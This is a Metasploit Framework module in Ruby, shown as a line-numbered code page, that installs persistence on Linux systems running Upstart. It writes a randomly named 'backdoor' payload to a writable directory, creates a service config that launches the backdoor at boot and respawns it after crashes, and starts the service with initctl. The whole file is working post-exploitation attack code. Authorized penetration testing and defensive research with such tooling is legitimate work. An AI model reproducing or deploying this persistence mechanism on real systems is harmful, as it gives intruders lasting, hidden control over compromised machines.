Path: blob/master/modules/exploits/linux/persistence/init_upstart.rb
31192 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Post::File9include Msf::Post::Unix10include Msf::Exploit::EXE # for generate_payload_exe11include Msf::Exploit::FileDropper12include Msf::Exploit::Local::Persistence13prepend Msf::Exploit::Remote::AutoCheck14include Msf::Exploit::Deprecated15moved_from 'exploits/linux/local/service_persistence'1617def initialize(info = {})18super(19update_info(20info,21'Name' => 'Service Upstart Persistence',22'Description' => %q{23This module will create a service on the box, and mark it for auto-restart.24We need enough access to write service files and potentially restart services25Targets:26CentOS 627Fedora >= 9, < 1528Ubuntu >= 9.10, <= 14.1029},30'License' => MSF_LICENSE,31'Author' => [32'h00die',33],34'Platform' => ['unix', 'linux'],35'Targets' => [36[37'Upstart', {38runlevel: '2345'39}40],41],42'DefaultTarget' => 0,43'Privileged' => true,44'Arch' => [45ARCH_CMD,46ARCH_X86,47ARCH_X64,48ARCH_ARMLE,49ARCH_AARCH64,50ARCH_PPC,51ARCH_MIPSLE,52ARCH_MIPSBE53],54'References' => [55['URL', 'https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples'],56['ATT&CK', Mitre::Attack::Technique::T1543_CREATE_OR_MODIFY_SYSTEM_PROCESS],57['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],58['URL', 'http://blog.terminal.com/getting-started-with-upstart/']59],60'SessionTypes' => ['shell', 'meterpreter'],61'Notes' => {62'Stability' => [CRASH_SAFE],63'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],64'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]65},66'DisclosureDate' => '2006-08-24' # upstart release date67)68)6970register_options(71[72OptString.new('PAYLOAD_NAME', [false, 'Name of shell file to write']),73OptString.new('SERVICE', [false, 'Name of service to create']),74OptInt.new('RESTART_LIMIT', [false, 'Name of service to create', 3]),75OptEnum.new('INIT_FOLDER', [false, 'Init folder location', 'auto', ['auto', 'init', 'init.d']])76]77)78end7980def init_folder81if datastore['INIT_FOLDER'] == 'init' ||82(83datastore['INIT_FOLDER'] == 'auto' &&84exists?('/etc/init')85)86return '/etc/init'87end8889'/etc/init.d'90end9192def check93print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if writable_dir.start_with?('/tmp')94return CheckCode::Safe("#{writable_dir} isnt writable") unless writable?(writable_dir)95return CheckCode::Safe("#{init_folder} isnt writable") unless writable?(init_folder)9697return CheckCode::Safe('Likely not an upstart based system') unless command_exists?('initctl')9899CheckCode::Appears("#{writable_dir} is writable and system is upstart based")100end101102def install_persistence103backdoor = write_shell(writable_dir)104105path = backdoor.split('/')[0...-1].join('/')106file = backdoor.split('/')[-1]107108upstart(path, file, target.opts[:runlevel])109end110111def write_shell(path)112file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10)113backdoor = "#{path}/#{file_name}"114vprint_status("Writing backdoor to #{backdoor}")115if payload.arch.first == 'cmd'116write_file(backdoor, payload.encoded)117chmod(backdoor, 0o711)118else119upload_and_chmodx backdoor, generate_payload_exe120end121@clean_up_rc << "rm #{backdoor}\n"122123fail_with(Failure::NoAccess, 'File not written, check permissions.') unless file_exist?(backdoor)124125backdoor126end127128def upstart(backdoor_path, backdoor_file, runlevel)129script = <<~EOF130description "Start daemon at boot time"131start on filesystem or runlevel [#{runlevel}]132stop on shutdown133# Ensure only one instance runs134pre-start script135if [ -f /var/run/#{backdoor_file}.pid ] && kill -0 $(cat /var/run/#{backdoor_file}.pid) 2>/dev/null; then136echo "#{backdoor_file} is already running."137exit 1138fi139end script140script141echo $$ > /var/run/#{backdoor_file}.pid142exec #{backdoor_path}/#{backdoor_file}143end script144post-stop script145rm -f /var/run/#{backdoor_file}.pid146sleep 10147end script148respawn149respawn limit #{datastore['RESTART_LIMIT']} 300150EOF151service_filename = datastore['SERVICE'] || Rex::Text.rand_text_alpha(7..12)152service_name = "#{init_folder}/#{service_filename}.conf"153vprint_status("Writing service: #{service_name}")154write_file(service_name, script)155156fail_with(Failure::NoAccess, 'Service file not written, check permissions.') unless file_exist?(service_name)157158@clean_up_rc << "rm #{service_name}"159vprint_status('Starting service')160cmd_exec("initctl start #{service_filename}")161end162end163164165